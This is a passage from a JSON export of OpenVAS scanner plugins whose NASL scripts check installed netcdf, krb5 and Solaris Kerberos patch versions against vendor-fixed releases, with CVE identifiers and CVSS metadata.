"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for netcdf MDVA-2010:129 (netcdf)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"netcdf on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"This updates fixes a wrong Obsoletes: tag on netcdf package which\n would break upgrades to 2010.1.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00040.php\");\n script_id(831019);\n script_version(\"$Revision: 8205 $\");\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\", \"CVE-2010-1321\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-30 14:39:22 +0200 (Fri, 30 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVA\", value: \"2010:129\");\n script_name(\"Mandriva Update for netcdf MDVA-2010:129 (netcdf)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of netcdf\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetcdf4\", rpm:\"libnetcdf4~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetcdf-devel\", rpm:\"libnetcdf-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetcdf-static-devel\", rpm:\"libnetcdf-static-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netcdf\", rpm:\"netcdf~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netcdf4\", rpm:\"lib64netcdf4~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netcdf-devel\", rpm:\"lib64netcdf-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netcdf-static-devel\", rpm:\"lib64netcdf-static-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:19", "description": "Check for the Version of netcdf", "cvss3": {}, "published": "2010-04-30T00:00:00", "type": "openvas", "title": "Mandriva Update for netcdf MDVA-2010:129 (netcdf)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1321", "CVE-2006-3083", "CVE-2006-3084"], "modified": "2018-01-18T00:00:00", "id": "OPENVAS:1361412562310831019", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831019", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for netcdf MDVA-2010:129 (netcdf)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"netcdf on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"This updates fixes a wrong Obsoletes: tag on netcdf package which\n would break upgrades to 2010.1.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00040.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831019\");\n script_version(\"$Revision: 8457 $\");\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\", \"CVE-2010-1321\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-30 14:39:22 +0200 (Fri, 30 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVA\", value: \"2010:129\");\n script_name(\"Mandriva Update for netcdf MDVA-2010:129 (netcdf)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of netcdf\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetcdf4\", rpm:\"libnetcdf4~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetcdf-devel\", rpm:\"libnetcdf-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetcdf-static-devel\", rpm:\"libnetcdf-static-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netcdf\", rpm:\"netcdf~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netcdf4\", rpm:\"lib64netcdf4~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netcdf-devel\", rpm:\"lib64netcdf-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netcdf-static-devel\", rpm:\"lib64netcdf-static-devel~4.0.1~5.1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:56", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-2017", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-2442", "CVE-2007-2798", "CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2007-4000", "CVE-2007-2443", "CVE-2007-3999"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861526", "href": "http://plugins.openvas.org/nasl.php?oid=861526", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-2017\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora 7\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00087.html\");\n script_id(861526);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-2017\");\n script_cve_id(\"CVE-2007-3999\", \"CVE-2007-4000\", \"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2798\", \"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-2017\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server-ldap\", rpm:\"krb5-server-ldap~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-servers\", rpm:\"krb5-workstation-servers~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-debuginfo\", rpm:\"krb5-debuginfo~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-clients\", rpm:\"krb5-workstation-clients~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-servers\", rpm:\"krb5-workstation-servers~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-clients\", rpm:\"krb5-workstation-clients~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server-ldap\", rpm:\"krb5-server-ldap~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-debuginfo\", rpm:\"krb5-debuginfo~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.6.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:17", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-2066", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-2442", "CVE-2007-2798", "CVE-2007-4743", "CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2007-4000", "CVE-2007-2443", "CVE-2007-3999"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861237", "href": "http://plugins.openvas.org/nasl.php?oid=861237", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-2066\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora 7\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00128.html\");\n script_id(861237);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-2066\");\n script_cve_id(\"CVE-2007-3999\", \"CVE-2007-4000\", \"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2798\", \"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\", \"CVE-2007-4743\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-2066\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-servers\", rpm:\"krb5-workstation-servers~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-debuginfo\", rpm:\"krb5-debuginfo~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-clients\", rpm:\"krb5-workstation-clients~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server-ldap\", rpm:\"krb5-server-ldap~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server-ldap\", rpm:\"krb5-server-ldap~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-debuginfo\", rpm:\"krb5-debuginfo~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-servers\", rpm:\"krb5-workstation-servers~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-clients\", rpm:\"krb5-workstation-clients~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.1~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:21", "description": "Check for the Version of Obsoleted by", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Obsoleted by 109224-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855375", "href": "http://plugins.openvas.org/nasl.php?oid=855375", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Obsoleted by 109224-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Obsoleted by on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Obsoleted by\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855375);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109224-10\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for Obsoleted by 109224-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109224-10-1\");\n\n script_summary(\"Check for the Version of Obsoleted by\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"109224-10\", package:\"SUNWcsl SUNWgss SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:04", "description": "Check for the Version of libkadm5 library", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for libkadm5 library 116175-05", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855127", "href": "http://plugins.openvas.org/nasl.php?oid=855127", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 library 116175-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 library on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5 library\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855127);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116175-05\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 library 116175-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116175-05-1\");\n\n script_summary(\"Check for the Version of libkadm5 library\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116175-05\", package:\"SUNWkrbu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 